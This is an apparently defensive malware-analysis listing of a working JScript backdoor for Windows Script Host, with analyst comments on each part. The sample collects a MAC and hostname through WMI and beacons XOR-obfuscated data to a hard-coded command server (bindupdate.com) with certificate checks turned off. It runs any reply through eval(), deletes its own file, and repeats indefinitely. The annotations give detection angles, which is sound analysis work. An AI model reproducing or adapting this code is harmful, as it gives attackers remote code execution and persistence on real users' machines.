/*
h/t @HONKONE_K
MD5: dcfa396e3f500d67afa7157adb639819
C2: bindupdate[.]com
*/
// Analyst annotations only; the statements are the sample exactly as listed.
// `anonymous` is the name the Function constructor gives the functions it
// builds, so this is presumably the body of a `new Function(...)` / eval'd
// stage (the wrapper is never invoked within this listing). As far as the
// visible code shows, it: builds a host identifier over WMI, POSTs an
// XOR-obfuscated beacon to the hard-coded domain, eval()s whatever comes
// back, sleeps about two minutes, and repeats forever.
function anonymous() {
  // ---- string table --------------------------------------------------------
  // Every literal the script needs is bound to a randomly named variable so
  // the body itself carries no readable strings. Several entries are duplicates
  // of others or are never referenced below; they look like padding.
  var ilurjolohm = "string";                         // typeof comparison in id()
  var uhywimwofko = "User-Agent";                    // request header name
  var hduzmalpomaq = "encrypt";                      // unused duplicate of atvihufepce
  var cuxtusyxa = "POST";                            // unused duplicate of oqabkiqyv
  var oswepogyg = "Content-Type";                    // request header name
  var ijybynzuhb = "create_image";                   // URL file segment (get_path)
  var udwelysvusudf = "request";                     // send_data() mode: beacon
  var yzqopuhquqf = "https://bindupdate.com/";       // C2 base URL (same domain as the header note)
  var mykipfopwod = "_";                             // separator inside the host identifier
  var nywwejfodupu = "";                             // unused
  var asybsadyml = "";                               // unused
  var jxatonahythy = "decrypt";                      // unused duplicate of awmydsywyhi
  // Fixed beacon fields; the `time` value matches the ~120 s sleep in main().
  var xufuzqytfani = "group=zsoc._2205&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=";
  var mixohemo = "z";                                // upper bound for hostname characters (id())
  var ofagepcablar = "Unknown";                      // hostname fallback
  var furfuvwuces = "&";
  var awivegobd = "_";                               // unused duplicate of mykipfopwod
  var bimivqano = "&id=";
  var fwocfisypfe = "application/x-www-form-urlencoded";
  var ymcokwaxvihew = "get_image";                   // URL file segment
  var ymjozrykigxu = "MSXML2.ServerXMLHTTP";         // ProgID of the HTTP client (send_data)
  var idjuhruswiv = "content";                       // URL directory segment
  var awmydsywyhi = "decrypt";                       // crypt_controller() mode
  var rpeclydyzjovi = "show_jpg";                    // URL file segment
  var wqydixispo = "encrypt";                        // unused duplicate of atvihufepce
  var apxopobzecxa = "images";                       // URL directory segment
  var idluzguqqykux = "WScript.Shell";               // ProgID (environment-variable expansion)
  var qkafuzposy = "cdn";                            // URL directory segment
  var muxhypvuxmyrn = "Scripting.FileSystemObject";  // ProgID (folder check, self-delete)
  var ijvilybzylde = "";                             // unused
  var yvdimugupuqf = "fetch";                        // URL directory segment
  var otpupvazlysgugs = "string";                    // unused duplicate of ilurjolohm
  var atvihufepce = "encrypt";                       // crypt_controller() mode
  var mhukbudsawim = "/";
  var oqabkiqyv = "POST";                            // HTTP method
  var akrobinum = "?request=page";                   // query string for beacon requests
  var jofmyhubxemde = "show_png";                    // URL file segment
  var ekitubecip = "kywzewfixu=";                    // form field name that carries the beacon
  var darovykqu = "image";                           // URL directory segment
  var ebahpyloqu = "create_logo";                    // URL file segment
  var pniqexqipdixy = "winmgmts:root/CIMV2";         // WMI moniker used by id()
  var fdoxwirunpu = "";                              // unused
  var amifadevga = "?request=content&id=";           // query string for result uploads
  var cyhjiryda = "request";                         // unused duplicate of udwelysvusudf
  var ezredenyd = "no";                              // unused duplicate of ijyhnavaq
  var ekoclyjiwi = "";                               // empty string: split/join separator
  var ytynqicafuwb = "%APPDATA%";
  var hytojbixduq = "show_ico";                      // URL file segment
  var attesdoquxe = "action=get_command";            // beacon payload sent by main()
  var owzafamuqj = "";                               // unused
  var ijyhnavaq = "no";                              // sentinel returned by send_data() on failure

  // Host identifier: "<MAC>_<DNS host name>" of the first IP-enabled adapter.
  // Runs a WMI query through the `wmi` object created at the bottom of this
  // wrapper (var hoisting; it is assigned before main() first gets here).
  // Returns undefined if no adapter yields a string MAC longer than one char.
  // Detection angle: wscript.exe querying Win32_NetworkAdapterConfiguration.
  function id() {
    var lrequest = wmi.ExecQuery("select * from Win32_NetworkAdapterConfiguration where ipenabled = true");
    var lItems = new Enumerator(lrequest);
    for (; !lItems.atEnd(); lItems.moveNext()) {
      var mac = lItems.item().macaddress;
      var dns_hostname = lItems.item().DNSHostName;
      if (typeof mac === ilurjolohm && mac.length > 1) {
        // NOTE(review): this guard reads `.length` on a value it has just
        // established is NOT a string, so a null/undefined DNSHostName throws
        // here instead of falling back to "Unknown".
        if (typeof dns_hostname !== ilurjolohm && dns_hostname.length < 1) {
          dns_hostname = ofagepcablar;
        } else {
          // Any character that sorts after "z" ("{", "|", non-ASCII, ...) is
          // replaced by "_", presumably to keep the value safe inside the
          // form-encoded beacon body.
          for (var i = 0; i < dns_hostname.length; i++) {
            if (dns_hostname.charAt(i) > mixohemo) {
              dns_hostname = dns_hostname.substr(0, i) + mykipfopwod + dns_hostname.substr(i + 1);
            }
          }
        }
        return mac + mykipfopwod + dns_hostname;
      }
    }
  }

  // Reversible XOR obfuscation with a 4-digit numeric key. The key travels
  // inside the message itself, so this hides content from casual inspection
  // only; it is not encryption. Wire format, before escape():
  //   <xor'd bytes> + ")*(" + <key digits>
  // type === "decrypt": `request` is an escape()d server message; it is split
  //   on ")*(" and the first part is XOR'd with the digits of the second.
  // any other type (the callers pass "encrypt"): a random key in 1000..9999 is
  //   drawn, `request` is UTF-8 encoded via unescape(encodeURIComponent(...)),
  //   XOR'd, then ")*(" + key is appended and the whole thing is escape()d.
  // The decrypt path never undoes the UTF-8 step, so non-ASCII bytes in a
  // server reply stay as individual byte-valued characters.
  // Detection angle: the ")*(" delimiter followed by four digits in unescaped
  // POST bodies to this host.
  function crypt_controller(type, request) {
    var encryption_key = ekoclyjiwi;
    if (type === awmydsywyhi) {
      request = unescape(request);
      var request_split = request.split(")*(");
      request = request_split[0];
      encryption_key = request_split[1].split(ekoclyjiwi); // key as an array of digit chars
    } else {
      encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split(ekoclyjiwi);
      request = unescape(encodeURIComponent(request));
    }
    var output = new Array(request.length);
    for (var i = 0; i < request.length; i++) {
      // Key digits cycle over the input; each char is XOR'd with a digit's char code.
      var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);
      output[i] = String.fromCharCode(charCode);
    }
    var result_string = output.join(ekoclyjiwi);
    if (type === atvihufepce) {
      result_string = result_string + ")*(" + encryption_key.join(ekoclyjiwi);
      result_string = escape(result_string);
    }
    return result_string;
  }

  // Picks a random "<dir>/<file>" under the C2 base URL, i.e. one of 5 x 6
  // benign-looking paths: {images, image, content, fetch, cdn} over
  // {create_logo, get_image, create_image, show_ico, show_png, show_jpg}.
  // The query string appended by the caller, not the path, selects the action.
  function get_path() {
    var pathes = [apxopobzecxa, darovykqu, idjuhruswiv, yvdimugupuqf, qkafuzposy];
    var files = [ebahpyloqu, ymcokwaxvihew, ijybynzuhb, hytojbixduq, jofmyhubxemde, rpeclydyzjovi];
    var path = pathes[Math.floor(Math.random() * pathes.length)] + mhukbudsawim + files[Math.floor(Math.random() * files.length)];
    return yzqopuhquqf + path;
  }

  // Synchronous HTTPS POST to the C2 through MSXML2.ServerXMLHTTP.
  // type === "request": beacon. URL is get_path() + "?request=page"; body is
  //   "kywzewfixu=" + encode(fixed fields + uniq_id + "&id=" + id() + "&" + data).
  //   `crypt` is ignored in this branch -- the body is always encoded.
  // otherwise: result upload. URL is get_path() + "?request=content&id=" +
  //   uniq_id; `data` is encoded only when `crypt` is truthy.
  // Returns responseText, or the "no" sentinel if anything throws (COM object
  // creation, DNS, TLS, network). `uniq_id` comes from the enclosing scope.
  function send_data(type, data, crypt) {
    try {
      var http_object = new ActiveXObject(ymjozrykigxu);
      if (type === udwelysvusudf) {
        http_object.open(oqabkiqyv, get_path() + akrobinum, false); // false = synchronous
        data = ekitubecip + crypt_controller(atvihufepce, xufuzqytfani + uniq_id + bimivqano + id() + furfuvwuces + data);
      } else {
        http_object.open(oqabkiqyv, get_path() + amifadevga + uniq_id, false);
        if (crypt) {
          data = crypt_controller(atvihufepce, data);
        }
      }
      // Spoofed browser UA. It is internally inconsistent (Gecko rv:58.0 paired
      // with a Firefox/50.0 product token), which makes the exact string a
      // usable proxy/IDS match.
      http_object.setRequestHeader(uhywimwofko, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/50.0");
      http_object.setRequestHeader(oswepogyg, fwocfisypfe);
      // ServerXMLHTTP option 2 is the ignore-server-certificate-errors flag
      // set; 13056 (0x3300) turns off all of those checks, so the C2 can sit
      // behind a self-signed or mismatched certificate -- and so can a TLS-
      // intercepting sensor.
      http_object.setOption(2, 13056);
      http_object.send(data);
      return http_object.responseText;
    } catch (e) {
      return ijyhnavaq;
    }
  }

  // Command loop. Beacons with "action=get_command"; any reply other than the
  // "no" failure sentinel is decoded and handed straight to eval(), i.e. the
  // server gets arbitrary JScript execution inside the WSH process, with any
  // exception swallowed. Then sleeps ~120 s with jitter (115000..131000 ms as
  // written) and calls itself again -- there is no exit condition, and because
  // this is recursion rather than a loop every cycle adds a stack frame.
  function main() {
    var ncommand = ekoclyjiwi;
    ncommand = send_data(udwelysvusudf, attesdoquxe, true);
    if (ncommand !== ijyhnavaq) {
      try {
        eval(crypt_controller(awmydsywyhi, ncommand)); // remote code execution point
      } catch (e) {}
    }
    // Math.floor(Math.random() * 16001) is 0..16000, so the offset is -5000..+11000.
    var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);
    WScript.Sleep(random_knock);
    main();
  }

  // ---- entry sequence (runs when the wrapper is invoked) --------------------
  var first = false;                       // never read
  var shell = new ActiveXObject(idluzguqqykux);
  var fso = new ActiveXObject(muxhypvuxmyrn);
  var wmi = GetObject(pniqexqipdixy);      // WMI connection consumed by id()
  // The "unique" session id is just the current UTC millisecond (0..999), so it
  // collides freely across victims; presumably the id() value is the real key
  // server-side -- not verifiable from this listing.
  var uniq_id = new Date().getUTCMilliseconds();
  var app_path = shell.expandEnvironmentStrings(ytynqicafuwb);
  // Gates on the %APPDATA% folder's Type description being longer than five
  // characters (e.g. "File folder"). Whether this is an environment sanity
  // check or a sandbox heuristic is not evident from the code; if the folder
  // is missing, GetFolder throws and nothing below runs.
  if (fso.GetFolder(app_path).Type.length > 5) {
    // Anti-forensics: removes its own script file from disk while the already
    // loaded code keeps running in the interpreter. A wscript.exe process
    // deleting its own ScriptFullName is a strong detection signal.
    fso.deleteFile(WScript.ScriptFullName);
    try {
      WScript.Sleep(120000);               // initial two-minute delay before the first beacon
      main();
    } catch (e) {
      main();                              // reached only if the first main() throws
    }
  }
}